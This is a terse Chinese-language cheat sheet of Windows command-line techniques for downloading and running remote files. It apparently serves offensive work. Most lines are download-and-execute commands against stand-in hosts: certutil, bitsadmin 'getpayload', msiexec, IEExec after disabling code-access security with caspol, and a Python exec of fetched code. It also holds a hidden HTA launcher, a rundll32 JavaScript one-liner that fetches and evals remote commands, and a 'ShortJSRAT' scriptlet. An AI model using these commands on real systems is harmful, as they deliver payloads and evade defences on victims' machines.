Windows下命令行下载文件总结

$client = new-object System.Net.WebClient

$client.DownloadFile(‘http://payloads.online/file.tar.gz’, ‘E:\file.tar.gz’)

ftp 192.168.3.2输入用户名和密码后

lcd E:\file # 进入E盘下的file目录cd www # 进入服务器上的www目录get access.log # 将服务器上的access.log下载到E:\file

copy \192.168.3.1\c$\test.exe E:\file

certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt

    1、bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt    2、bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt

msiexec /q /i http://192.168.3.1/test.txt

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s offC:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe

C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <script language="VBScript">Window.ReSizeTo 0, 0Window.moveTo -2000,-2000Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令self.close</script><body>demo</body></HEAD> </HTML>

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

<?XML version="1.0"?><scriptlet><registration    progid="ShortJSRAT"    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >    <!-- Learn from Casey Smith @subTee -->    <script language="JScript">        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);

        ]]></script></registration></scriptlet>